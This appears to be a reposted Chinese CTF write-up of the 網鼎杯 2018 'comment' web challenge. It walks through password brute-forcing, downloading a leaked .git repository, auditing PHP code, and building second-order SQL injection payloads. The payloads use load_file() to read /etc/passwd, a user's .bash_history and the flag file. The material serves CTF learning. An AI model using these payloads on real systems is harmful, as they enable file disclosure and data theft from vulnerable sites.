2. 程式人生 > 實用技巧 >攻防世界-web-comment(密碼爆破、.git洩漏、程式碼審計、sql二次注入)

攻防世界-web-comment(密碼爆破、.git洩漏、程式碼審計、sql二次注入)

阿新 發佈:2020-09-16

題目來源:網鼎杯 2018
題目描述:SQL

一、密碼爆破

進入場景後,點擊發帖,輸入內容提交後,系統返回登入頁面

可以看到賬號框預設賬號為:zhangwei 密碼為zhangwei***

由於僅密碼的後三位不知道,我們想到了爆破。

爆破出來的密碼為zhangwei666

二、.git洩漏

嘗試訪問http://220.249.52.133:35828/.git/,系統返回無許可權,說明存在.git洩漏。

使用如下命令下載git原始碼

python GitHack.py http://220.249.52.133:35828/.git/

發現write_do.php,內容如下

<?php
include
 
 "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    break;
case 'comment':
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}

 
?>

這個程式碼應該不全,這裡附網友找到的完整程式碼(不知道是怎麼找到的)

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes
 
($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

三、SQL二次注入

登入成功後看到可以發帖加上題目提示sql,猜測應該是sql注入。再結合write_do.php的程式碼審計,發現存在明顯的二次注入。

comment模組中的$category是直接從board中取出資料,沒有過濾就直接放入sql語句中了~~
其中我們$category$content都可控~~

這道題目有個坑,大家需要注意一下

$sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";

這個sql語句是換行的,所以我們無法用單行註釋符,必須用/**/拼接。

我們拼接的語句如下

$sql = "insert into comment
            set category = '123',content=user(),/*',
                content = '*/#',
                bo_id = '$bo_id'";

我們學習一下師傅們的思路

1、首先我們先讀取/etc/passwd,就可以得知www使用者的目錄。payload如下

category為: 123',content=(select( load_file('/etc/passwd'))),/*
留言內容為:*/#

2、然後讀history檔案:/home/www/.bash_history,可以看到網站管理員的歷史命令。payload如下

category為: 123',content=(select( load_file('/home/www/.bash_history'))),/*
留言內容為:*/#

分析上圖中的歷史命令

  • 先在/tmp目錄下解壓壓縮包
  • 然後刪除壓縮包
  • 再將html目錄複製到/var/www/目錄下
  • 切換到/var/www/html,然後刪除.DS_Store,啟動apache

我們發現,管理員僅刪除了/var/www/html目錄下的.DS_Store檔案,但是並沒有刪除/tmp/html目錄下的原始檔案,所以我們可以讀取此檔案。

3、讀取.DS_Store檔案內容,查詢flag檔名。payload如下

category為: 123',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*
留言內容為:*/#

這兒由於檔案太大,不能完全顯示,所以我們用十六進位制編碼,然後找個網站解碼就行了。

解碼後發現檔名flag_8946e1ff1ee3e40f.php

4、最後我們讀取此檔案即可得到flag。payload如下

category為: 123',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*
留言內容為:*/#

參考:

https://blog.csdn.net/weixin_43093631/article/details/106650625

https://blog.csdn.net/a3320315/article/details/104216070

相關推薦

攻防世界-web-comment密碼爆破.git洩漏程式碼審計sql注入

題目來源:網鼎杯 2018題目描述:SQL密碼爆破 進入場景後,點擊發帖,輸入內容提交後,系統返回登入頁面

攻防世界-web-unfinishsql注入

題目來源:網鼎杯 2018題目描述:SQL 題目如下,是個登入頁面 通過awvs掃描得知存在register.php註冊頁面,並且註冊介面存在SQL盲注漏洞。

攻防世界-web-Web_php_wrong_nginx_config繞過登入目錄瀏覽後門利用

進入場景後,提示需要登入 嘗試開啟robots.txt頁面,發現2個隱藏頁面:hint.php和Hack.php

攻防世界-web-favorite_numberphp5.5的陣列key溢位換行符繞過正則跨行匹配inode號繞過檔名過濾檔案輸出繞過正則

進入介面 <?php //php5.5.9 $stuff = $_POST[\"stuff\"]; $array = [\'admin\', \'user\']; if($stuff === $array && $stuff[0] != \'admin\') {

攻防世界-web-blgdel.htaccess檔案上傳上傳+包含漏洞

題目來源:CISCN-2018-Final題目描述:暫無 開啟頁面,是一個購物網站,可以註冊登入新增購物車購買商品等。

攻防世界-web-filemanager原始碼洩漏注入

題目來源:XDCTF 2015題目描述:暫無 進入介面 這題看似檔案上傳,其實主要是利用sql注入修改指定檔案在資料庫中的字尾名為空。

攻防世界-web-php_rceThinkPHP 5.0命令執行漏洞

本題進入場景後顯示如下頁面 這是一個 thinkphp 框架,先檢視版本號。在網址上隨意輸入一個不存在的模組 地址:

攻防世界-web-love_mathbase_convert進位制轉換繞過白名單和長度限制

題目來源:CISCN題目描述:解密 進入介面 <?php error_reporting(0); //聽說你很喜歡數學,不知道你是否愛它勝過愛flag

攻防世界-web-ics-07PHP弱型別linux目錄結構特性繞過檔案型別過濾)

工控雲管理系統專案管理頁面解析漏洞。 進入題目後,點選進入專案管理頁面。

攻防世界-web-ics-02sql注入ssrf目錄掃描

題目來源:XCTF 4th-CyberEarth題目描述:工控雲管理系統的文件中心頁面,存在不易被發現的漏洞。

攻防世界web進階

1.PHP_python_template_injection 1.題目提示python模板注入,測試http://220.249.52.133:47149/{{7+7}},發現回顯“URL http://220.249.52.133:47149/14 not found”,說明括號裡的程式碼被執行了,存在SSTI。

攻防世界 - Web進階

supersqli: !!! 1.判斷有誤注入,1\'報錯, 1’ 報錯,1’# 正常且為True,1’ and 1=1# 正常且為True,1’ and 1=2# 正常且為False,所以它裡邊存在注入

攻防世界-web-Confusion1(python模板注入SSTI沙箱逃逸)

題目來源:XCTF 4th-QCTF-2018題目描述:某天,Bob說:PHP是最好的語言,但是Alice不贊同。所以Alice編寫了這個網站證明。在她還沒有寫完的時候,我發現其存在問題。(請不要使用掃描器)

攻防世界-crypto-easychallenge.pyc反編譯

進入題目後下載附件,發現是一個.pyc檔案。 pyc是一種二進位制檔案,是由py檔案經過編譯後,生成的檔案,是一種byte code,py檔案變成pyc檔案後,執行載入的速度會有所提高;另一反面,把py檔案編譯為pyc檔案,從而可

攻防世界-crypto-Normal_RSAopenssl和rsatool工具解密RSA

進入題目後下載附件,發現是2個檔案,flag.enc和pubkey.pem。猜測分別為加密後的flag和RSA公鑰。

攻防世界-Web進階-supersqli

很久之前做的題目了,現在拿到有點想不起來,記一下方法 其一:堆疊注入rename+alter

攻防世界-web PHP2

首先我們先將環境下載下來。 進入之後 ,發現一句話 Can you anthenticate to this website?大概就是在說,你能告訴我這個網站嗎?

攻防世界-web進階-Web_php_include

程式碼中得知page中帶有php://的都會被替換成空 str_replace()以其他字元替換字串中的一些字元(區分大小寫)

攻防世界-web-高手進階區017-supersqli

方法一: 1.輸入1’發現不回顯,然後1’ #顯示正常,應該是存在sql注入了      

攻防世界Web篇前五題解析

第一題 進入以後我們發現右鍵檢視原始碼被禁用了,這時候有兩種解決方法。